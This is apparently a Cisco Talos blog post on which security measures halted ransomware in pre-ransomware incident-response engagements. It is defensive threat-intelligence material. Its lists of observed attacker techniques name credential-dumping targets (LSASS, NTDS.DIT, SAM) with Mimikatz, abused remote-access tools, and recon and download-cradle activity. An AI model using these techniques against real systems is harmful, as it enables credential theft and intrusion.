Stopping ransomware before it starts: Lessons from Cisco Talos Incident Response
- Over the past two and a half years (January 2023 through June 2025), Cisco Talos Incident Response (Talos IR) has responded to numerous engagements that we classified as pre-ransomware incidents.
- Talos looked back to analyze what key security measures were credited with deterring ransomware deployment in each pre-ransomware engagement, finding that the top two factors were swift engagement with the incident response team and rapid actioning of alerts from security solutions (predominantly within two hours of the alert).
- We also classified almost two dozen observed pre-ransomware indicators in these engagements, as the top observed tactics provide insight into what malicious activity frequently preempts a more severe attack. Finally, we analyzed Talos IR’s most frequent recommendations to customers to ascertain common security gaps.
- Aggregation of this data and the follow-on analysis is intended to provide actionable guidance that can assist organizations in improving their defenses against ransomware activity.
What characterizes an incident as “pre-ransomware?”
Talos IR associates specific adversary actions with pre-ransomware activity. When threat actors attempt to gain enterprise-level domain administrator access, they often conduct a series of account pivots and escalations, deploy command-and-control (C2) or other remote access solutions, harvest credentials and/or deploy automation to execute the modification of the OS. Though the specific tools or elements in the attack chain vary by adversary, Talos IR has seen these same classic steps in practice for years. These actions, along with observed indicators of compromise (IOCs) or tactics, techniques and procedures (TTPs) that we associate with known ransomware threats without the end result of enterprise-wide encryption, lead us to categorize an incident as “pre-ransomware.”
It is worth noting that some of the above attack techniques are also often deployed by initial access brokers (IABs) who seek to gain and sell access to compromised systems, and it is possible some of the incidents involved in this case study could have therefore been perpetrated by IABs instead of ransomware operators. While it is often challenging to determine a threat actor’s end goal, we have high confidence that all incidents involved tactics are consistently seen preceding ransomware deployment. If the adversary was instead an IAB, we have seen these types of IAB campaigns very frequently result in a ransomware attack after access has been sold, rendering the activity relevant to this analysis.
Key security actions and measures that deter ransomware deployment
Talos analyzed incident response engagements spanning the past two and a half years that we categorized as pre-ransomware attacks, identifying actions and security measures that we assessed were key in halting adversaries’ attack chains before encryption. An overview of our findings can be found in Figure 1, followed by a more thorough breakdown of each category to explore exactly how certain actions impeded ransomware execution.

Swift engagement of Talos IR
Engaging Talos IR within one to two days of first observed adversary activity (though we advise engagement as quickly as possible) was credited with preventing a more serious ransomware attack in approximately a third of engagements, providing benefits such as:
- Extensive knowledge of the threat landscape: In multiple engagements, Talos IR was able to correlate TTPs and IOCs on customers’ networks with other ransomware and pre-ransomware engagements we had responded to, identifying when the infection was part of a larger, widespread campaign. This insight helped Talos IR anticipate and intercept adversaries’ next steps as well as provide customers additional IOCs to block that were seen in other engagements.
- Actionable recommendations for isolation and remediation: In some engagements, the customers quickly acted on Talos’ pre-ransomware security guide, which Talos IR assessed prevented more catastrophic events.
- Enhanced monitoring: The Cisco Extended Detection and Response (Cisco XDR) team can provide extra vigilance in their monitoring after containment of the pre-ransomware threat to ensure full eradication.
We observed numerous incidents where Talos IR was not engaged by the customer immediately, which enabled the adversary to continue working through their attack chain and conduct data theft and/or ransomware deployment. This often results in consequences such as backup files being corrupted or encrypted, endpoint detection and response (EDR) and other security tools being disabled, disruption to day-to-day operations and more.
EDR/MDR alert prompted security teams’ rapid containment
Vigilant monitoring of security solutions and logs allows network administrators to act quickly when a threat is first detected, isolate the malicious activity and cut off threat actors’ ability to escalate their attack. In our case study, action from the security team within two hours of an alert from the organization’s EDR or managed detection and response (MDR) solution correlated with successful isolation of the threat in almost a third of engagements. Some of the observed alerts that prompted swift response in pre-ransomware engagements included, amongst others:
- Attempted connections to blocked domains
- Brute force activity
- PowerShell download cradle
- Deviations from expected baseline activity as determined by the organization
- Newly created domain administrator accounts
- Successful connections to an unknown, outside public IP addresses
- Reconnaissance activity, including shell access and user discovery commands such as
whoami
- Modification of multi-factor authentication (MFA) tooling to provide bypass tokens
- Modification of an account to be exempt from MFA requirements
USG and/or other partners notified on ransomware staging
In almost 15 percent of engagements, targeted organizations were able to get ahead of the threat to their environment due to notification from U.S. government (USG) partners and representatives of their managed service provider (MSP) about possible ransomware staging in their environment. In particular, the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) has launched an initiative to provide early warnings about potential ransomware attacks, aiming to help organizations detect threats and evict actors before significant damage occurs. CISA’s intelligence predominately derives from their partnerships with the cybersecurity research community, infrastructure providers and cyber threat intelligence companies.
Security solutions configured to block and quarantine malicious activity
In over 10 percent of Talos IR engagements, customers’ security solutions actively blocked and/or quarantined malicious executables, effectively stopping adversaries’ attack chains in their tracks.
Talos often observes organizations deploying endpoint protection technology in a passive manner, meaning the product is producing alerts to the user but not taking other actions. This configuration puts organizations at unnecessary risk, and Talos IR has responded to multiple engagements where passive deployment enabled threat actors to execute malware, including ransomware. A more aggressive configuration impeded ransomware deployment in this case study, underscoring its importance.
Robust security restrictions prevented access to key resources
Based on our analysis, organizations’ robust security restrictions were key in impeding ransomware actors’ attack chains in nine percent of engagements. For example, in one engagement, the threat actors compromised a service account at the targeted organization, but appropriate privilege restrictions on the account prevented their attempts to access key systems like domain controllers.
Also of note, organizations who implemented thorough logging and/or had a SIEM in place to aggregate event data were able to provide Talos with forensic visibility to determine the exact chain of events and where additional security measures could be implemented. When an organization lacks these records, it can be challenging to identify the precise security weaknesses that enabled threat activity.
Most observed pre-ransomware indicators
Upon categorizing TTPs observed in this case study per the MITRE ATT&CK framework, Talos found that the following in Figure 2 were most frequently seen across engagements.

We dove deeper into some of the top attack techniques and found the following:
- Remote Services: Talos IR frequently saw remote services such as RDP, PsExec and PowerShell leveraged by adversaries.
- Remote Access Software: Frequently seen remote access software included AnyDesk, Atera, Microsoft Quick Assist and Splashtop.
- OS Credential Dumping: Top observed credential dumping techniques/locations included the domain controller registry, the SAM registry hive, AD Explorer, LSASS and NTDS.DIT. Mimikatz was also frequently used.
- Network Service Discovery: Top observed tools and commands used for network service discovery included netscan, nltest and netview.
The top observed TTPs serve as a reminder to security teams on what malicious activity often preempts a more severe attack. For example, prioritizing moderating the use of remote services and remote access software and/or securing the aforementioned credential stores could assist in limiting the majority of adversaries seen in these pre-ransomware engagements.
Observed security gaps and prevalent Talos IR recommendations
Talos IR crafts security recommendations for customers in each incident upon analyzing the environment and the adversary’s attack chain to help address any existing security weaknesses. Our most frequent recommendations include:
- Bring all operating systems and software patching up to date.
- Store backups offline.
- Configure security solutions to permit only proven benign applications to launch and prevent the installation of unexpected software.
- Require MFA on all critical services, including remote access and identity access management (IAM) services, and monitor for MFA misuse.
- Deploy Sysmon for enhanced endpoint visibility and logging.
- Implement meaningful firewall rules for both inbound and outbound traffic to block unwanted protocols from being able to be used by adversaries as part of their C2 or data exfiltration actions.
- Implement robust network segmentation to minimize lateral movement and reduce the attack surface, ensuring valuable assets such as domain controllers do not connect directly to the internet aside from critical functions.
- Establish or intensify end-user cybersecurity training on social engineering tactics, including coverage of recently popularized attacks such as MFA fatigue attacks and actor-in-the-middle token phishing attacks.
Cisco Talos Blog – Read More